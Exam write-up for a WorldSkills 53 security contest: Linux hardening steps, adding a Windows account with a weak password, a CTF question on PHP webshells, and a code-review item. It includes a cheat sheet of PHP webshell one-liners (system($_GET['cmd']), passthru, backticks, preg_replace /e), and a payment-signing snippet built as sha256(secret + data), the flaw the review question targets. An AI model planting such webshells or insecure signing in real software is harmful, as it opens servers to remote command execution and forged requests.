--- title: World Skills 53 Writeup tag: World Skill --- [Exam File Download](https://drive.google.com/uc?export=download&id=1Pt7Hji0B1bFOFqGnXruDtAitN-wOdnbB) # 安全強化暨數位鑑識 ## (二) 特權帳戶與安全強化 9 -> 8 -> 7 -> 10 ### 9. 設定 iptables 以禁止 [lyondows] ping 到 [lyonus] (拒絕所有 ping 封包) ```bash sudo iptables -A INPUT -p icmp -j REJECT ``` Adds a rule to the "INPUT" chain of the iptables firewall, which rejects incoming "ICMP" traffic. - `-A INPUT` : Append firewall rule to "INPUT" chain. - `-p icmp` : Use "ICMP" protocol. - `-j REJECT` : Tell Linux to reject the packet if the packet matches the previous rules. > Use `sudo iptables -S` to list out all of the active iptables rules to check if the rule was configured properly. > **Example output:** > ``` > -P INPUT DROP > -P FORWARD DROP > -P OUTPUT ACCEPT > -A INPUT -p icmp -j REJECT --reject-with icmp-port-unreachable > ``` ### 8. 設定 webadmin 使用者，令其可以透過 sudo (需輸入密碼)執行 ssh 指令 ```bash sudo useradd webadmin ``` Add a new user name "webadmin". - `webadmin` : Add "webadmin" user. ```bash sudo usermod -aG sudo webadmin ``` Append the "webadmin" user to the "sudo" group. - `-aG` : Append (`-a`) to group (`-G`) > Use `groups webadmin` to verify the result. The output should contain "sudo". > **Example output:** > ``` > webadmin: webadmin sudo > ``` ### 7. 使用 facl 限制 webadmin 使用者，令其不能執行 ssh 指令 ```bash which ssh ``` Locate the path of "ssh". ```bash sudo setfacl -m u:webadmin:- /usr/bin/ssh ``` Modify the ACL(Access Control List) of "/usr/bin/ssh", removing all permissions for "webadmin". - `u:webadmin:-` : The "\-"("\-\-\-") symbol removes all permission for user "webadmin" from accessing "/usr/bin/ssh". > Use `getfacl /usr/bin/ssh` to list the ACL of "/usr/bin/ssh". The output should contain "user:webadmin:---". > **Example output:** > ``` > getfacl: Removing leading '/' from absolute path names > # file: usr/bin/ssh > # owner: root > # group: root > user::rwx > user:webadmin:--- > group::r-x > other::r-x > ``` [Linux ACL](https://www.redhat.com/sysadmin/linux-access-control-lists) ### 10. webadmin 執行 sudo ssh 登入到 [lyondows]，透過 lyon 帳號，新增下列指定使用者至 [lyondows] 上：使用者帳號 `weakman`、密碼 `haha456` ```bash ssh user@172.16.70.40 ``` Login to 172.16.70.40 with username "user". The default shell should be CMD, if not, enter `cmd.exe` to open it. ```bash net user weakman haha456 /add ``` Create a new user account name "weakman" and password "haha456". - `weakman`: The username of the account. - `haha456`: The password of the account. - `/add`: Add a user account to the user accounts database. > Use `net user` to list all user accounts for the computer. The output should contain "weakman". > **Example output:** > ``` > User accounts for \\DESKTOP-FINA67K > ------------------------------------------------- > Administrator DefaultAccount Guest > sshd user WDAGuilityAccount > weakman # CTF ## 第二部分：Web ### 5. 請參考 USB 上本題資料後將以下兩題選擇題答案寫到答案卷試題 5 上。 #### 1. 請問 webshell.php 是以哪個 PHP 函式呼叫系統指令? - A. System - B. Passthru - C. Exec - D. shell_exec ```php # Execute one command <?php system("whoami"); ?> # Take input from the url paramter. shell.php?cmd=whoami <?php system($_GET['cmd']); ?> # The same but using passthru <?php passthru($_GET['cmd']); ?> # For shell_exec to output the result you need to echo it <?php echo shell_exec("whoami");?> # Exec() does not output the result without echo, and only output the last line. So not very useful! <?php echo exec("whoami");?> # Instead to this if you can. It will return the output as an array, and then print it all. <?php exec("ls -la",$array); print_r($array); ?> # preg_replace(). This is a cool trick <?php preg_replace('/.*/e', 'system("whoami");', ''); ?> # Using backticks <?php $output = `whoami`; echo "<pre>$output</pre>"; ?> # Using backticks <?php echo `whoami`; ?> ``` ## 第三部分：Code Review ### 7. 假設以下程式碼皆可正常運行，請指出程式碼中帶有資安弱點的程式碼行數，並從選項中選出弱點的類型。 ```python import hashlib from flask import Flask,redirect from tools import randid secret = "XXXXXXX" app = Flask(__name__) def sign(data): _data = secret + data return hashlib.sha256(_data.encode('utf-8')).hexdigest() @app.route('/redirect_to_paygateway') def redirect_to_paygateway(): tid = randid() parameters = "tid={0}&amount={1}".format(tid, 1399) return redirect("https://gateway/payment?" + parameters + "&sign=" + sign(parameters), code=302) ``` https://docs.python.org/zh-tw/3/library/pickle.html {%hackmd theme-dark %}